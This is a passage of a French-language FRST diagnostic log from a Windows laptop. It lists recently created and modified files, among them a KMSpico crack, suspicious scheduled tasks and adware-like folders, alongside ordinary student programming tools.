S3 WinDivert1.1; C:\Program Files\KMSpico\WinDivert.sys [35376 2020-06-12] (Nemea Mjukvaruutveckling AB -> Basil Projects)
R3 WirelessButtonDriver64; C:\Windows\System32\drivers\WirelessButtonDriver64.sys [34944 2018-05-11] (HP Inc. -> HP)
U4 npcap_wifi; pas de ImagePath

==================== NetSvcs (Avec liste blanche) ===================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)


==================== Trois mois (créés) (Avec liste blanche) =========

(Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.)

2020-12-09 15:19 - 2020-12-09 15:20 - 015555784 _____ C:\Users\HP\Downloads\SharpDevelop_4.4.1.9729_Setup.msi
2020-12-09 15:14 - 2020-12-09 15:19 - 000027643 _____ C:\Users\HP\Downloads\FRST.txt
2020-12-09 15:13 - 2020-12-09 15:16 - 000000000 ____D C:\FRST
2020-12-09 15:12 - 2020-12-09 15:13 - 002288640 _____ (Farbar) C:\Users\HP\Downloads\FRST64.exe
2020-12-09 15:12 - 2020-12-09 15:12 - 002288640 _____ (Farbar) C:\Users\HP\Downloads\Non confirmé 822175.crdownload
2020-12-09 15:12 - 2020-12-09 15:12 - 002288640 _____ (Farbar) C:\Users\HP\Downloads\Non confirmé 739670.crdownload
2020-12-09 14:22 - 2020-12-09 14:22 - 000004608 _____ C:\Windows\SECOH-QAD.exe
2020-12-09 14:22 - 2020-12-09 14:22 - 000003584 _____ C:\Windows\SECOH-QAD.dll
2020-12-09 14:21 - 2020-12-09 14:21 - 000003470 _____ C:\Windows\system32\Tasks\AutoPico Daily Restart
2020-12-09 13:43 - 2020-12-09 13:54 - 000000000 ____D C:\Program Files (x86)\TotalAV
2020-12-09 13:43 - 2020-12-09 13:43 - 000001089 _____ C:\Users\HP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\TotalAV.lnk
2020-12-09 13:43 - 2020-12-09 13:43 - 000001064 _____ C:\Users\Public\Desktop\TotalAV.lnk
2020-12-09 13:43 - 2020-12-09 13:43 - 000000000 ____D C:\Users\HP\AppData\Local\GUI.Win
2020-12-09 13:43 - 2020-12-09 13:43 - 000000000 ____D C:\ProgramData\TotalAV
2020-12-09 13:43 - 2020-12-09 13:43 - 000000000 ____D C:\ProgramData\SecuritySuite
2020-12-09 13:43 - 2020-05-29 09:15 - 000096264 _____ (Windows (R) Win 7 DDK provider) C:\Windows\system32\Drivers\webshieldfilter.sys
2020-12-09 13:42 - 2020-12-09 13:42 - 054108544 _____ C:\Users\HP\Downloads\TotalAV_Setup.exe
2020-12-09 13:10 - 2020-12-09 13:10 - 000195424 _____ (HelpSrv Network) C:\Windows\helpsrv.sys
2020-12-09 13:10 - 2020-12-09 13:10 - 000000000 ____D C:\ProgramData\sib
2020-12-09 13:09 - 2020-12-09 13:09 - 000032768 _____ C:\Users\HP\AppData\Roaming\1607515759026-shm
2020-12-09 13:09 - 2020-12-09 13:09 - 000000000 _____ C:\Users\HP\AppData\Roaming\1607515759026-wal
2020-12-09 13:08 - 2020-12-09 13:09 - 000000000 ____D C:\Users\Public\Thunder Network
2020-12-09 13:08 - 2020-12-09 13:08 - 000000000 ____D C:\ProgramData\Thunder Network
2020-12-09 13:07 - 2020-12-09 13:36 - 000000000 ____D C:\Users\HP\AppData\Roaming\i1n4djy5svb
2020-12-09 13:07 - 2020-12-09 13:36 - 000000000 ____D C:\Program Files\ARN5VLCP30
2020-12-09 13:07 - 2020-12-09 13:34 - 000003258 _____ C:\Windows\system32\Tasks\csrss
2020-12-09 13:07 - 2020-12-09 13:12 - 000000000 ____D C:\Program Files (x86)\RearRips
2020-12-09 13:07 - 2020-12-09 13:09 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RearRips
2020-12-09 13:07 - 2020-12-09 13:07 - 000032768 _____ C:\Users\HP\AppData\Roaming\1607515644977-shm
2020-12-09 13:07 - 2020-12-09 13:07 - 000003568 _____ C:\Windows\system32\Tasks\ScheduledUpdate
2020-12-09 13:07 - 2020-12-09 13:07 - 000000000 ___HD C:\Windows\rss
2020-12-09 13:07 - 2020-12-09 13:07 - 000000000 ____D C:\Program Files (x86)\Seed Trade
2020-12-09 13:07 - 2020-12-09 13:07 - 000000000 ____D C:\Program Files (x86)\Bubble Browser
2020-12-09 13:07 - 2020-12-09 13:07 - 000000000 _____ C:\Users\HP\AppData\Roaming\1607515644977-wal
2020-12-09 13:02 - 2020-12-09 15:23 - 000000000 ____D C:\Program Files (x86)\MachinerData
2020-12-09 13:01 - 2020-12-09 13:36 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Yne Recorder
2020-12-09 13:01 - 2020-12-09 13:36 - 000000000 ____D C:\Program Files (x86)\Yne Recorder
2020-12-09 13:01 - 2020-12-09 13:36 - 000000000 ____D C:\Program Files (x86)\trtuy
2020-12-09 13:01 - 2020-12-09 13:06 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OSFMount
2020-12-09 13:01 - 2020-12-09 13:06 - 000000000 ____D C:\Program Files (x86)\OSFMount
2020-12-09 13:01 - 2020-12-09 13:06 - 000000000 ____D C:\Program Files (x86)\BestZip
2020-12-09 13:01 - 2020-12-09 13:01 - 000000000 ____D C:\Users\HP\AppData\Roaming\305f7ca580575406.60124791_888
2020-12-09 13:01 - 2014-04-03 20:22 - 000645592 _____ C:\Windows\SysWOW64\sqlite3.dll
2020-12-09 13:00 - 2020-12-09 13:06 - 000000000 ____D C:\ProgramData\AllDup
2020-12-09 13:00 - 2020-12-09 13:06 - 000000000 ____D C:\Program Files (x86)\afAllDup
2020-12-09 13:00 - 2020-12-09 13:00 - 000000000 ____D C:\Users\HP\AppData\Roaming\AllDup
2020-12-09 12:58 - 2020-12-09 12:58 - 000000000 ____D C:\Users\HP\AppData\Local\Piders
2020-12-08 07:58 - 2020-12-08 07:58 - 001551804 _____ C:\Users\HP\AppData\Roaming\179442746
2020-12-07 15:26 - 2020-12-07 15:26 - 000000072 _____ C:\Users\HP\Untitled12.ipynb
2020-12-06 11:30 - 2020-12-06 11:34 - 000000000 ____D C:\Users\HP\AppData\Roaming\AnyDesk
2020-12-05 21:12 - 2020-12-05 21:12 - 001109403 _____ C:\Users\HP\Desktop\Projet Professionel Licence Fin de Formation Bongo Nts Jeffr! (Transport Logist Glo)SCM.pptx
2020-12-05 04:24 - 2020-12-05 04:25 - 000000000 ____D C:\ProgramData\Adobe
2020-12-05 04:24 - 2020-12-05 04:24 - 000000000 ____D C:\Users\HP\AppData\Roaming\Adobe
2020-12-05 02:09 - 2020-12-08 20:14 - 000000000 ____D C:\Users\HP\AppData\Local\Adobe
2020-12-04 15:29 - 2020-12-04 15:37 - 000000000 ____D C:\VIDEO
2020-12-03 17:02 - 2020-12-03 17:29 - 000001626 _____ C:\Users\HP\Untitled11.ipynb
2020-12-03 14:24 - 2020-12-03 14:56 - 000017288 _____ C:\Users\HP\Untitled10.ipynb
2020-12-03 10:38 - 2020-12-03 23:47 - 000000000 ____D C:\Users\HP\eclipse-workspace
2020-12-03 10:38 - 2020-12-03 10:38 - 000000000 ____D C:\Users\HP\AppData\Local\Eclipse
2020-12-03 10:38 - 2020-12-03 10:38 - 000000000 ____D C:\Users\HP\.tooling
2020-12-03 10:37 - 2020-12-05 19:05 - 000001166 _____ C:\Users\HP\Desktop\Eclipse IDE for Eclipse Committers - 2020-09.lnk
2020-12-03 10:37 - 2020-12-03 10:37 - 000000000 ____D C:\Users\HP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Eclipse
2020-12-03 10:19 - 2020-12-03 10:19 - 000000000 ____D C:\Users\HP\eclipse
2020-12-03 09:31 - 2020-12-03 09:31 - 000000000 ____D C:\Users\HP\AppData\Local\OneDrive
2020-12-03 08:24 - 2020-12-01 13:05 - 000000030 _____ C:\AVScanner.ini
2020-12-02 23:17 - 2020-12-09 12:31 - 000000000 ____D C:\Users\HP\vpworkspace
2020-12-02 23:13 - 2020-12-09 12:07 - 000000000 ____D C:\Users\HP\visualparadigm
2020-12-02 23:12 - 2020-12-02 23:12 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Visual Paradigm
2020-12-02 23:11 - 2020-12-02 23:12 - 000000000 ____D C:\Program Files\Visual Paradigm for UML 10.0
2020-12-02 22:59 - 2020-12-02 22:59 - 000562950 _____ C:\Users\HP\Desktop\Scan1.pdf
2020-12-01 19:55 - 2020-12-09 01:15 - 000000000 ____D C:\Users\HP\.p2
2020-12-01 19:55 - 2020-12-03 10:19 - 000000000 ____D C:\Users\HP\.eclipse
2020-12-01 13:03 - 2020-12-01 13:03 - 000002136 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2020-12-01 13:03 - 2020-12-01 13:03 - 000002124 _____ C:\Users\Public\Desktop\Acrobat Reader DC.lnk
2020-11-26 16:29 - 2020-11-26 16:58 - 000018078 _____ C:\Users\HP\Untitled9.ipynb
2020-11-26 14:55 - 2020-11-26 16:05 - 000030914 _____ C:\Users\HP\Untitled8.ipynb
2020-11-25 23:32 - 2020-12-03 07:11 - 000000000 ____D C:\Users\HP\AppData\Roaming\Adobe.BackupByPhotoshopPortable
2020-11-25 11:25 - 2020-11-25 11:25 - 000000000 ____D C:\Users\HP\AppData\Roaming\java
2020-11-25 11:24 - 2020-11-25 11:24 - 000000000 ____D C:\Users\HP\Documents\VPProjects
2020-11-25 10:32 - 2020-12-02 22:43 - 000000000 ____D C:\Users\HP\AppData\Roaming\VisualParadigm
2020-11-19 16:57 - 2020-11-19 17:23 - 000024696 _____ C:\Users\HP\Untitled7.ipynb
2020-11-19 16:15 - 2020-11-19 16:35 - 000027212 _____ C:\Users\HP\3_reconnaissance_chiffres_decision_tree_validation_test knn.ipynb
2020-11-19 14:41 - 2020-11-19 16:13 - 000023699 _____ C:\Users\HP\2_reconnaissance_chiffres_decision_tree_validation_test (1) (1).ipynb
2020-11-19 14:41 - 2020-11-19 14:41 - 000000072 _____ C:\Users\HP\Untitled6.ipynb
2020-11-19 14:34 - 2020-11-19 14:41 - 000000779 _____ C:\Users\HP\Untitled5.ipynb
2020-11-19 10:39 - 2020-11-19 10:39 - 000001092 _____ C:\Users\Public\Desktop\Enterprise Architect.lnk
2020-11-19 10:39 - 2020-11-19 10:39 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Enterprise Architect 13
2020-11-18 19:51 - 2020-11-18 19:51 - 000000000 ____D C:\Windows\system32\Tasks\Mozilla
2020-11-18 19:45 - 2020-11-18 19:45 - 000000000 ____D C:\Users\HP\AppData\Roaming\Wireshark
2020-11-18 19:13 - 2020-11-18 19:13 - 000000000 ____D C:\Users\HP\AppData\Roaming\xm1
2020-11-18 17:25 - 2020-11-18 17:25 - 000000000 ____D C:\Users\HP\AppData\Roaming\Dev-Cpp
2020-11-18 17:24 - 2020-11-18 17:24 - 000001069 _____ C:\Users\HP\Desktop\Dev-C++.lnk
2020-11-18 17:24 - 2020-11-18 17:24 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bloodshed Dev-C++
2020-11-18 17:23 - 2020-11-18 17:23 - 000001840 _____ C:\Users\HP\rrrr.alg
2020-11-18 17:23 - 2020-11-18 17:23 - 000000000 ____D C:\Program Files (x86)\Dev-Cpp
2020-11-18 16:55 - 2020-11-18 16:55 - 000002511 _____ C:\Users\Public\Desktop\Algobox.lnk
2020-11-18 16:55 - 2020-11-18 16:55 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Algobox
2020-11-18 16:55 - 2020-11-18 16:55 - 000000000 ____D C:\Program Files (x86)\Algobox
2020-11-18 04:47 - 2020-11-18 04:47 - 001101312 _____ C:\Windows\SysWOW64\TextInputMethodFormatter.dll
2020-11-18 04:47 - 2020-11-18 04:47 - 000000315 _____ C:\Windows\system32\DrtmAuth9.bin
2020-11-18 04:47 - 2020-11-18 04:47 - 000000315 _____ C:\Windows\system32\DrtmAuth8.bin
2020-11-18 04:47 - 2020-11-18 04:47 - 000000315 _____ C:\Windows\system32\DrtmAuth7.bin
2020-11-18 04:47 - 2020-11-18 04:47 - 000000315 _____ C:\Windows\system32\DrtmAuth6.bin
2020-11-18 04:47 - 2020-11-18 04:47 - 000000315 _____ C:\Windows\system32\DrtmAuth5.bin
2020-11-18 04:47 - 2020-11-18 04:47 - 000000315 _____ C:\Windows\system32\DrtmAuth4.bin
2020-11-18 04:47 - 2020-11-18 04:47 - 000000315 _____ C:\Windows\system32\DrtmAuth3.bin
2020-11-18 04:47 - 2020-11-18 04:47 - 000000315 _____ C:\Windows\system32\DrtmAuth2.bin
2020-11-18 04:47 - 2020-11-18 04:47 - 000000315 _____ C:\Windows\system32\DrtmAuth12.bin
2020-11-18 04:47 - 2020-11-18 04:47 - 000000315 _____ C:\Windows\system32\DrtmAuth11.bin
2020-11-18 04:47 - 2020-11-18 04:47 - 000000315 _____ C:\Windows\system32\DrtmAuth10.bin
2020-11-18 04:47 - 2020-11-18 04:47 - 000000315 _____ C:\Windows\system32\DrtmAuth1.bin
2020-11-18 04:46 - 2020-11-18 04:46 - 001841152 _____ C:\Windows\system32\TextInputMethodFormatter.dll
2020-11-18 04:46 - 2020-11-18 04:46 - 000200704 _____ C:\Windows\system32\IHDS.dll
2020-11-18 04:46 - 2020-11-18 04:46 - 000164864 _____ C:\Windows\system32\DataStoreCacheDumpTool.exe
2020-11-17 23:13 - 2020-11-20 21:34 - 000000000 ____D C:\Users\HP\AppData\Roaming\Sparx Systems
2020-11-17 23:12 - 2020-11-19 10:39 - 000000000 ____D C:\Program Files (x86)\Sparx Systems
2020-11-17 16:32 - 2020-11-18 20:26 - 000000000 ____D C:\Program Files\Mozilla Firefox
2020-11-12 16:48 - 2020-11-12 17:44 - 000002504 _____ C:\Users\HP\Untitled4.ipynb
2020-11-12 15:11 - 2020-11-12 15:53 - 000052346 _____ C:\Users\HP\Untitled3.ipynb
2020-11-12 14:52 - 2020-11-12 15:11 - 000005949 _____ C:\Users\HP\Untitled2.ipynb
2020-11-12 14:43 - 2020-11-12 14:44 - 000000000 ____D C:\Users\HP\.matplotlib
2020-11-12 14:34 - 2020-11-12 14:47 - 000021988 _____ C:\Users\HP\Untitled1.ipynb
2020-11-12 14:33 - 2020-11-12 14:33 - 000000000 ____D C:\Users\HP\.conda
2020-11-12 14:31 - 2020-11-19 17:13 - 000000000 ____D C:\Users\HP\.jupyter
2020-11-12 13:59 - 2020-11-12 13:59 - 000000000 ____D C:\Users\HP\AppData\Roaming\Jedi
2020-11-12 13:57 - 2020-11-12 13:57 - 000000000 ____D C:\Users\HP\.ipython
2020-11-12 13:56 - 2020-12-07 15:26 - 000000000 ____D C:\Users\HP\.ipynb_checkpoints
2020-11-12 13:56 - 2020-11-12 14:05 - 000001181 _____ C:\Users\HP\Untitled.ipynb
2020-11-12 13:55 - 2020-12-07 15:26 - 000000000 ____D C:\Users\HP\AppData\Roaming\jupyter
2020-11-11 22:01 - 2020-11-11 22:02 - 000000000 ____D C:\Users\HP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Python 3.7
2020-11-11 22:01 - 2020-11-11 22:01 - 000000000 ____D C:\Users\HP\AppData\Local\Package Cache
2020-11-10 23:28 - 2020-11-26 12:07 - 000000000 ____D C:\Users\HP\Documents\NetBeansProjects
2020-11-10 22:44 - 2020-11-10 22:45 - 000000000 ____D C:\Users\HP\AppData\Roaming\NetBeans
2020-11-10 22:44 - 2020-11-10 22:44 - 000000000 ____D C:\Users\HP\AppData\Local\NetBeans
2020-11-10 14:53 - 2020-11-10 14:53 - 000000000 ____D C:\Program Files\Apache Software Foundation
2020-11-10 14:52 - 2020-11-10 14:53 - 000000000 ____D C:\Program Files\glassfish-4.1.1
2020-11-10 14:48 - 2020-11-10 14:48 - 000002094 _____ C:\Users\Public\Desktop\NetBeans IDE 8.2.lnk
2020-11-10 14:48 - 2020-11-10 14:48 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NetBeans
2020-11-10 14:46 - 2020-11-10 14:56 - 000000000 ____D C:\Program Files\NetBeans 8.2
2020-11-10 14:29 - 2020-11-10 14:29 - 000000000 ____D C:\Users\HP\AppData\Roaming\Sun
2020-11-10 14:28 - 2020-11-10 14:28 - 000192168 _____ (Oracle Corporation) C:\Windows\system32\WindowsAccessBridge-64.dll
2020-11-10 14:25 - 2020-11-10 14:28 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java Development Kit
2020-11-10 14:25 - 2020-11-10 14:28 - 000000000 ____D C:\Program Files\Java
2020-11-10 13:40 - 2020-11-10 15:12 - 000000000 ____D C:\Users\HP\.nbi
2020-11-09 13:51 - 2020-12-09 14:39 - 000001425 _____ C:\Windows\system32\Drivers\etc\hosts.ics
2020-11-05 11:25 - 2020-11-05 11:25 - 000000000 ____D C:\Users\HP\Documents\Python Scripts
2020-11-05 11:25 - 2020-11-05 11:25 - 000000000 ____D C:\Users\HP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Anaconda3 (64-bit)
2020-11-05 10:57 - 2020-11-12 14:34 - 000000000 ____D C:\Users\HP\Anaconda3
2020-11-03 10:56 - 2020-11-03 10:56 - 000002066 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Wireshark.lnk
2020-11-03 10:56 - 2020-11-03 10:56 - 000002054 _____ C:\Users\Public\Desktop\Wireshark.lnk
2020-11-03 10:51 - 2020-11-03 10:51 - 000003184 _____ C:\Windows\system32\Tasks\npcapwatchdog
2020-11-03 10:50 - 2020-11-03 10:50 - 000000000 ____D C:\Windows\SysWOW64\Npcap
2020-11-03 10:50 - 2020-11-03 10:50 - 000000000 ____D C:\Windows\system32\Npcap
2020-11-03 10:49 - 2020-11-03 10:56 - 000000000 ____D C:\Program Files (x86)\Wireshark
2020-11-03 10:49 - 2020-11-03 10:51 - 000000000 ____D C:\Program Files\Npcap
2020-11-03 10:35 - 2020-11-28 09:57 - 000000000 ____D C:\Users\HP\VirtualBox VMs
2020-11-03 10:32 - 2020-12-05 08:49 - 000000000 ____D C:\Users\HP\.VirtualBox
2020-11-03 10:32 - 2020-12-05 08:49 - 000000000 ____D C:\ProgramData\VirtualBox
2020-11-03 10:31 - 2020-11-03 10:31 - 000001149 _____ C:\Users\Public\Desktop\Oracle VM VirtualBox.lnk
2020-11-03 10:31 - 2020-11-03 10:31 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Oracle VM VirtualBox
2020-11-03 10:31 - 2020-11-03 10:31 - 000000000 ____D C:\Program Files\Oracle
2020-11-03 10:31 - 2020-10-16 10:04 - 001037392 _____ (Oracle Corporation) C:\Windows\system32\Drivers\VBoxDrv.sys
2020-11-03 10:31 - 2020-10-16 10:04 - 000187456 _____ (Oracle Corporation) C:\Windows\system32\Drivers\VBoxUSBMon.sys
2020-10-25 19:56 - 2020-10-25 20:44 - 000000000 ____D C:\Users\HP\AppData\Roaming\HandBrake
2020-10-25 19:55 - 2020-10-25 19:56 - 000000000 ____D C:\Users\HP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\HandBrake
2020-10-25 19:55 - 2020-10-25 19:56 - 000000000 ____D C:\Program Files\HandBrake
2020-10-25 19:55 - 2020-10-25 19:55 - 000000865 _____ C:\Users\HP\Desktop\HandBrake.lnk
2020-10-16 10:04 - 2020-10-16 10:04 - 000249344 _____ (Oracle Corporation) C:\Windows\system32\Drivers\VBoxNetLwf.sys
2020-10-16 10:04 - 2020-10-16 10:04 - 000239432 ____N (Oracle Corporation) C:\Windows\system32\Drivers\VBoxNetAdp6.sys
2020-10-16 10:04 - 2020-10-16 10:04 - 000174536 _____ (Oracle Corporation) C:\Windows\system32\Drivers\VBoxUSB.sys
2020-10-15 00:02 - 2020-10-06 01:13 - 000835472 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerApp.exe
2020-10-15 00:02 - 2020-10-06 01:13 - 000179608 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2020-10-14 09:43 - 2020-10-14 09:43 - 001756592 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2020-10-14 09:43 - 2020-10-14 09:43 - 001366136 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2020-10-14 09:43 - 2020-10-14 09:43 - 000860160 _____ C:\Windows\system32\MBR2GPT.EXE
2020-10-14 09:43 - 2020-10-14 09:43 - 000035840 _____ C:\Windows\system32\deploymentcsphelper.exe
2020-09-30 17:29 - 2020-11-22 00:17 - 000000000 ____D C:\Program Files\Microsoft Update Health Tools
2020-09-16 21:15 - 2020-10-05 23:18 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools
2020-09-16 21:15 - 2020-09-16 21:15 - 000002456 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype for Business.lnk
2020-09-15 09:33 - 2020-09-15 09:33 - 000001818 _____ C:\Users\HP\Desktop\test.html
2020-09-13 11:57 - 2020-09-13 11:10 - 308812494 _____ C:\Users\HP\Desktop\CULTE 13-09-20.mp4
2020-09-13 01:22 - 2020-04-24 02:22 - 000166760 _____ (Samsung Electronics Co., Ltd.) C:\Windows\system32\Drivers\ssudmdm.sys
2020-09-12 23:17 - 2019-09-26 04:43 - 000136040 _____ (Samsung Electronics Co., Ltd.) C:\Windows\system32\Drivers\ssudbus.sys

==================== Trois mois (modifiés) ==================

(Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.)

2020-12-09 15:23 - 2020-06-11 23:32 - 000000000 ____D C:\Program Files\KMSpico
2020-12-09 15:20 - 2020-06-11 23:32 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\KMSpico
2020-12-09 14:46 - 2019-03-19 05:52 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2020-12-09 14:15 - 2020-06-14 12:59 - 000000000 ____D C:\Users\HP\Desktop\DOC OBS
2020-12-09 14:11 - 2020-06-11 20:47 - 000000000 ____D C:\Users\HP\AppData\Local\CrashDumps
2020-12-09 14:11 - 2020-05-30 13:33 - 000000000 ____D C:\Windows\minidump
2020-12-09 13:33 - 2020-06-08 14:03 - 000000180 _____ C:\Windows\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2020-12-09 13:33 - 2020-06-08 14:03 - 000000000 __SHD C:\Users\HP\IntelGraphicsProfiles
2020-12-09 13:31 - 2020-06-15 17:54 - 000000000 ____D C:\ProgramData\VMware
2020-12-09 13:31 - 2020-06-08 13:22 - 000000000 ____D C:\ProgramData\Validity
2020-12-09 13:31 - 2020-05-30 13:24 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2020-12-09 13:30 - 2020-06-14 17:08 - 000000000 ____D C:\Users\HP\AppData\Roaming\uTorrent
2020-12-09 13:30 - 2019-03-19 05:37 - 001310720 _____ C:\Windows\system32\config\BBI
2020-12-09 10:54 - 2020-05-30 13:24 - 000000000 ____D C:\Windows\system32\SleepStudy
2020-12-09 01:07 - 2020-06-14 17:10 - 000000000 ____D C:\Users\HP\AppData\Local\BitTorrentHelper
2020-12-08 23:31 - 2020-07-21 18:37 - 000002442 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2020-12-08 23:31 - 2020-07-21 18:37 - 000002280 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk
2020-12-08 23:11 - 2019-03-19 05:52 - 000000000 ____D C:\Windows\LiveKernelReports
2020-12-08 20:03 - 2020-05-30 13:35 - 000000000 ____D C:\Users\HP
2020-12-08 14:00 - 2020-05-30 13:36 - 000000000 ____D C:\Users\HP\AppData\Local\Packages
2020-12-08 10:29 - 2020-06-15 17:59 - 000000000 ____D C:\Users\HP\AppData\Roaming\VMware
2020-12-08 08:45 - 2020-07-10 01:43 - 000000000 ____D C:\Users\HP\AppData\Local\Deployment
2020-12-08 04:00 - 2020-06-18 23:10 - 000000000 ____D C:\Users\HP\AppData\Local\ElevatedDiagnostics
2020-12-07 22:02 - 2020-06-15 17:59 - 000000000 ____D C:\Users\HP\AppData\Local\VMware
2020-12-07 14:34 - 2019-03-19 05:52 - 000000000 ___HD C:\Program Files\WindowsApps
2020-12-07 14:34 - 2019-03-19 05:52 - 000000000 ____D C:\Windows\AppReadiness
2020-12-07 13:27 - 2020-07-30 20:44 - 000000000 ___HD C:\Users\Public\Documents\AdobeGCData
2020-12-07 13:27 - 2020-07-30 20:44 - 000000000 ___HD C:\ProgramData\Documents\AdobeGCData
2020-12-06 19:14 - 2020-06-11 06:00 - 000000000 ____D C:\Program Files\Microsoft Office
2020-12-06 19:03 - 2020-06-14 12:04 - 000000000 ____D C:\Users\HP\AppData\Roaming\obs-studio
2020-12-06 12:19 - 2020-06-28 18:10 - 000000000 ____D C:\Users\HP\Desktop\DESKTOP-GCFI703 28-06-2020 17.49.30
2020-12-05 21:29 - 2020-07-30 20:47 - 000003522 _____ C:\Windows\system32\Tasks\AdobeGCInvoker-1.0
2020-12-05 04:24 - 2020-06-08 19:47 - 000000000 ____D C:\Users\HP\AppData\LocalLow\Adobe
2020-12-05 02:10 - 2020-06-08 19:46 - 000004562 _____ C:\Windows\system32\Tasks\Adobe Acrobat Update Task
2020-12-05 01:01 - 2020-07-10 01:38 - 000000000 ____D C:\Users\HP\AppData\Roaming\Office Timeline
2020-12-05 01:00 - 2020-07-10 01:38 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Office Timeline
2020-12-04 19:36 - 2020-06-09 13:17 - 000000000 ____D C:\pasto
2020-12-04 15:53 - 2020-05-30 13:24 - 000000000 ____D C:\Windows\system32\Drivers\wd
2020-12-04 02:27 - 2020-06-11 03:15 - 000003588 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA
2020-12-04 02:27 - 2020-06-11 03:15 - 000003464 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore
2020-12-03 17:38 - 2019-03-19 05:50 - 000000000 ____D C:\Windows\INF
2020-12-01 23:42 - 2020-06-16 20:34 - 000001082 _____ C:\Users\HP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\METEO.lnk
2020-12-01 13:05 - 2020-06-09 11:14 - 000000000 ____D C:\ProgramData\McAfee
2020-12-01 13:03 - 2020-06-08 19:45 - 000000000 ____D C:\Program Files (x86)\Adobe
2020-12-01 00:39 - 2020-08-17 13:32 - 000000000 ____D C:\Users\HP\Desktop\REGAL AFRIQUE
2020-11-27 08:28 - 2020-06-16 23:42 - 000000000 ____D C:\Users\HP\Documents\Virtual Machines
2020-11-25 09:53 - 2020-07-21 18:37 - 000003634 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2020-11-25 09:53 - 2020-07-21 18:37 - 000003510 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2020-11-23 23:04 - 2019-03-19 05:37 - 000000000 ____D C:\Windows\CbsTemp
2020-11-23 13:42 - 2020-05-30 13:35 - 001985224 _____ C:\Windows\system32\PerfStringBackup.INI
2020-11-23 13:42 - 2019-03-19 13:01 - 000870894 _____ C:\Windows\system32\perfh00C.dat
2020-11-23 13:42 - 2019-03-19 13:01 - 000185080 _____ C:\Windows\system32\perfc00C.dat
2020-11-22 09:02 - 2020-07-27 13:21 - 000000000 ____D C:\Users\HP\AppData\LocalLow\Mozilla
2020-11-22 09:02 - 2020-07-27 13:21 - 000000000 ____D C:\ProgramData\Mozilla
2020-11-19 14:01 - 2020-08-27 11:28 - 000000000 ____D C:\Users\HP\Desktop\BAROU
2020-11-18 20:33 - 2020-05-30 13:36 - 000000000 __RHD C:\Users\Public\AccountPictures
2020-11-18 20:33 - 2020-05-30 13:36 - 000000000 ___RD C:\Users\HP\3D Objects
2020-11-18 20:27 - 2020-05-30 13:24 - 000439128 _____ C:\Windows\system32\FNTCACHE.DAT
2020-11-18 20:26 - 2020-07-27 13:21 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2020-11-18 20:24 - 2019-03-19 13:04 - 000000000 ____D C:\Program Files\Windows Defender Advanced Threat Protection
2020-11-18 20:24 - 2019-03-19 05:52 - 000000000 ___RD C:\Windows\ImmersiveControlPanel
2020-11-18 20:24 - 2019-03-19 05:52 - 000000000 ____D C:\Windows\TextInput
2020-11-18 20:24 - 2019-03-19 05:52 - 000000000 ____D C:\Windows\SysWOW64\setup
2020-11-18 20:24 - 2019-03-19 05:52 - 000000000 ____D C:\Windows\SystemResources
2020-11-18 20:24 - 2019-03-19 05:52 - 000000000 ____D C:\Windows\system32\setup
2020-11-18 20:24 - 2019-03-19 05:52 - 000000000 ____D C:\Windows\system32\oobe
2020-11-18 20:24 - 2019-03-19 05:52 - 000000000 ____D C:\Windows\system32\migwiz
2020-11-18 20:24 - 2019-03-19 05:52 - 000000000 ____D C:\Windows\ShellExperiences
2020-11-18 20:24 - 2019-03-19 05:52 - 000000000 ____D C:\Windows\PolicyDefinitions
2020-11-18 20:24 - 2019-03-19 05:52 - 000000000 ____D C:\Windows\bcastdvr
2020-11-18 19:51 - 2020-07-27 13:21 - 000001005 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2020-11-18 17:04 - 2020-08-13 16:14 - 000000000 ____D C:\Users\HP\Desktop\PASTO
2020-11-18 04:56 - 2020-06-08 14:30 - 000000000 ____D C:\Windows\system32\MRT
2020-11-18 04:53 - 2020-06-08 14:30 - 133736600 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
